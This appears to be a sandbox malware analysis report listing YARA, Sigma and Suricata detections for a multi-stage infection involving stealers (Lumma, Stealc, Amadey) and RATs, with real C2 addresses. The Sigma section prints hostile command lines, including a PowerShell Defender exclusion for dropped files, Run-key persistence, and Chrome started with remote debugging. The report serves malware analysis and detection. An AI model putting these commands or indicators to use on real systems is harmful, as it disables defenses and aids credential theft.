28.2.powershell.exe.60b0328.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.powershell.exe.60b0328.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
28.2.powershell.exe.60324f8.1.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
28.2.powershell.exe.60324f8.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.powershell.exe.60324f8.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x30d80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x30cc0:$s1: CoGetObject 0x30d48:$s2: Elevation:Administrator!new:
36.2.downloaded_file.exe.11fffa0.1.raw.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
36.2.downloaded_file.exe.11fffa0.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
36.2.downloaded_file.exe.11fffa0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x36ce8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x36c18:$s1: CoGetObject 0x36cb0:$s2: Elevation:Administrator!new:
36.2.downloaded_file.exe.11fffa0.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
36.2.downloaded_file.exe.11fffa0.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x360e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x36018:$s1: CoGetObject 0x360b0:$s2: Elevation:Administrator!new:
39.2.explorer.exe.2dd0000.0.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
39.2.explorer.exe.2dd0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
39.2.explorer.exe.2dd0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x36ce8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x36c18:$s1: CoGetObject 0x36cb0:$s2: Elevation:Administrator!new:
36.0.downloaded_file.exe.8d0000.0.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
36.0.downloaded_file.exe.8d0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
36.0.downloaded_file.exe.8d0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
36.2.downloaded_file.exe.8d0000.0.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
36.2.downloaded_file.exe.8d0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
36.2.downloaded_file.exe.8d0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
28.2.powershell.exe.60324f8.1.raw.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
28.2.powershell.exe.60324f8.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.powershell.exe.60324f8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
28.2.powershell.exe.60b0328.0.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
28.2.powershell.exe.60b0328.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.powershell.exe.60b0328.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x30d80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x30cc0:$s1: CoGetObject 0x30d48:$s2: Elevation:Administrator!new:
27.2.callmobile.exe.5e80000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
41.2.explorer.exe.28a0000.0.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xd5ee8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xd6148:$string1: SELECT origin_url, username_value, password_value FROM logins 0xd63a8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xd6618:$string1: SELECT origin_url, username_value, password_value FROM logins 0xd6fb8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xe85a8:$string2: API call with %s database connection pointer 0xe9c60:$string3: os_win.c:%d: (%lu) %s(%s) - %s
9.2.DBFIEHDHII.exe.d40000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.skotes.exe.dd0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.skotes.exe.dd0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.skotes.exe.dd0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
16.2.wTMEVe8.exe.400000.1.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
19.0.wVBhC3KCkV.exe.7f0000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
16.2.wTMEVe8.exe.436060.2.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
16.2.wTMEVe8.exe.400000.1.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
16.2.wTMEVe8.exe.436060.2.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 32 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "", ParentImage: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe, ParentProcessId: 6792, ParentProcessName: WindosCPUsystem.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6812, ProcessName: powercfg.exe

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\60c1233683.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\downloaded_file.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, ParentProcessId: 7708, ParentProcessName: downloaded_file.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe', ProcessId: 2664, ProcessName: cmd.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentImage: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentProcessId: 7716, ParentProcessName: skotes.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1", ProcessId: 3284, ProcessName: powershell.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7396, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7640, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\60c1233683.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 4124, StartAddress: 9A0000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 1220

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentImage: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentProcessId: 7716, ParentProcessName: skotes.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1", ProcessId: 3284, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7752, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:59.308541+0100	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.4	53460	1.1.1.1	53	UDP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:42.663588+0100	2028371	3	Unknown Traffic	192.168.2.4	49862	104.21.16.9	443	TCP
2024-12-08T19:53:45.033067+0100	2028371	3	Unknown Traffic	192.168.2.4	49870	104.21.16.9	443	TCP
2024-12-08T19:53:47.899378+0100	2028371	3	Unknown Traffic	192.168.2.4	49880	104.21.16.9	443	TCP
2024-12-08T19:53:50.886858+0100	2028371	3	Unknown Traffic	192.168.2.4	49893	104.21.16.9	443	TCP
2024-12-08T19:53:52.101941+0100	2028371	3	Unknown Traffic	192.168.2.4	49894	154.216.20.243	443	TCP
2024-12-08T19:53:52.106991+0100	2028371	3	Unknown Traffic	192.168.2.4	49895	154.216.20.243	443	TCP
2024-12-08T19:53:54.364287+0100	2028371	3	Unknown Traffic	192.168.2.4	49906	104.21.16.9	443	TCP
2024-12-08T19:53:58.697314+0100	2028371	3	Unknown Traffic	192.168.2.4	49920	154.216.20.243	443	TCP
2024-12-08T19:54:00.398859+0100	2028371	3	Unknown Traffic	192.168.2.4	49929	104.21.16.9	443	TCP
2024-12-08T19:54:00.792515+0100	2028371	3	Unknown Traffic	192.168.2.4	49932	104.21.16.9	443	TCP
2024-12-08T19:54:00.991585+0100	2028371	3	Unknown Traffic	192.168.2.4	49933	154.216.20.243	443	TCP
2024-12-08T19:54:03.138854+0100	2028371	3	Unknown Traffic	192.168.2.4	49944	154.216.20.243	443	TCP
2024-12-08T19:54:03.857742+0100	2028371	3	Unknown Traffic	192.168.2.4	49946	104.21.16.9	443	TCP
2024-12-08T19:54:04.150275+0100	2028371	3	Unknown Traffic	192.168.2.4	49948	104.21.16.9	443	TCP
2024-12-08T19:54:05.667544+0100	2028371	3	Unknown Traffic	192.168.2.4	49954	154.216.20.243	443	TCP
2024-12-08T19:54:09.843192+0100	2028371	3	Unknown Traffic	192.168.2.4	49989	104.21.16.9	443	TCP
2024-12-08T19:54:30.590415+0100	2028371	3	Unknown Traffic	192.168.2.4	50045	104.21.16.9	443	TCP
2024-12-08T19:54:37.063316+0100	2028371	3	Unknown Traffic	192.168.2.4	50061	104.21.16.9	443	TCP

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:53.308915+0100	2022482	1	A Network Trojan was detected	192.168.2.4	49895	154.216.20.243	443	TCP

ET MALWARE JS/Nemucod.M.gen downloading EXE payload

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:53.548873+0100	2021954	1	A Network Trojan was detected	154.216.20.243	443	192.168.2.4	49895	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:43.373352+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49862	104.21.16.9	443	TCP
2024-12-08T19:53:45.857098+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49870	104.21.16.9	443	TCP
2024-12-08T19:54:01.948881+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49932	104.21.16.9	443	TCP
2024-12-08T19:54:04.594337+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49946	104.21.16.9	443	TCP
2024-12-08T19:54:31.450814+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50045	104.21.16.9	443	TCP
2024-12-08T19:54:37.813764+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50061	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:43.373352+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49862	104.21.16.9	443	TCP
2024-12-08T19:54:01.948881+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49932	104.21.16.9	443	TCP
2024-12-08T19:54:31.450814+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50045	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:45.857098+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49870	104.21.16.9	443	TCP
2024-12-08T19:54:04.594337+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49946	104.21.16.9	443	TCP
2024-12-08T19:54:37.813764+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50061	104.21.16.9	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:42.663588+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49862	104.21.16.9	443	TCP
2024-12-08T19:53:45.033067+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49870	104.21.16.9	443	TCP
2024-12-08T19:53:47.899378+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49880	104.21.16.9	443	TCP
2024-12-08T19:53:50.886858+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49893	104.21.16.9	443	TCP
2024-12-08T19:53:54.364287+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49906	104.21.16.9	443	TCP
2024-12-08T19:54:00.398859+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49929	104.21.16.9	443	TCP
2024-12-08T19:54:00.792515+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49932	104.21.16.9	443	TCP
2024-12-08T19:54:03.857742+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49946	104.21.16.9	443	TCP
2024-12-08T19:54:04.150275+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49948	104.21.16.9	443	TCP
2024-12-08T19:54:09.843192+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49989	104.21.16.9	443	TCP
2024-12-08T19:54:30.590415+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	50045	104.21.16.9	443	TCP
2024-12-08T19:54:37.063316+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	50061	104.21.16.9	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:21.079754+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49804	185.215.113.43	80	TCP
2024-12-08T19:53:30.272402+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49826	185.215.113.43	80	TCP
2024-12-08T19:53:35.134823+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49838	185.215.113.43	80	TCP
2024-12-08T19:53:43.783903+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49863	185.215.113.43	80	TCP
2024-12-08T19:53:52.224640+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49896	185.215.113.43	80	TCP
2024-12-08T19:53:59.937781+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49922	185.215.113.43	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:54:02.309645+0100	2044697	1	A Network Trojan was detected	192.168.2.4	49937	154.216.20.243	443	TCP

ET MALWARE Win32/DarkVision RAT CnC Checkin M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:53.614388+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49907	185.157.162.216	5200	TCP
2024-12-08T19:53:59.757259+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49934	185.157.162.216	5200	TCP
2024-12-08T19:54:02.614377+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49945	185.157.162.216	5200	TCP
2024-12-08T19:54:05.358627+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49961	185.157.162.216	5200	TCP
2024-12-08T19:54:08.131943+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49985	185.157.162.216	5200	TCP
2024-12-08T19:54:11.294133+0100	2045618	1	A Network Trojan was detected	192.168.2.4	50005	185.157.162.216	5200	TCP

ET MALWARE Win32/DarkVision RAT CnC Checkin M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:57.309649+0100	2045619	1	A Network Trojan was detected	192.168.2.4	49907	185.157.162.216	5200	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:41.298141+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.4	53951	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:52:04.552274+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:52:04.418613+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:52:04.872669+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:52:06.429911+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:52:05.001349+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:36.003207+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49839	77.73.39.158	80	TCP

ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:41.464682+0100	2048130	1	A Network Trojan was detected	192.168.2.4	49855	77.73.39.158	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:51.808385+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49893	104.21.16.9	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:52:03.930341+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-08T19:53:59.288077+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-08T19:54:10.139396+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49984	185.215.113.206	80	TCP
2024-12-08T19:54:42.232297+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50069	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:05.882467+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49766	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:19.657773+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49772	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:53:10.479303+0100	2803305	3	Unknown Traffic	192.168.2.4	49778	31.41.244.11	80	TCP
2024-12-08T19:53:22.598235+0100	2803305	3	Unknown Traffic	192.168.2.4	49805	31.41.244.11	80	TCP
2024-12-08T19:53:31.888074+0100	2803305	3	Unknown Traffic	192.168.2.4	49828	31.41.244.11	80	TCP
2024-12-08T19:53:36.606363+0100	2803305	3	Unknown Traffic	192.168.2.4	49842	185.215.113.16	80	TCP
2024-12-08T19:53:45.284647+0100	2803305	3	Unknown Traffic	192.168.2.4	49871	185.215.113.16	80	TCP
2024-12-08T19:53:54.004492+0100	2803305	3	Unknown Traffic	192.168.2.4	49904	185.215.113.16	80	TCP
2024-12-08T19:54:01.494013+0100	2803305	3	Unknown Traffic	192.168.2.4	49936	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T19:52:07.142481+0100	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-08T19:52:23.380994+0100	2803304	3	Unknown Traffic	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:25.261965+0100	2803304	3	Unknown Traffic	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:26.557010+0100	2803304	3	Unknown Traffic	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:27.669684+0100	2803304	3	Unknown Traffic	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:31.225809+0100	2803304	3	Unknown Traffic	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:32.322231+0100	2803304	3	Unknown Traffic	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:37.537276+0100	2803304	3	Unknown Traffic	192.168.2.4	49757	185.215.113.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

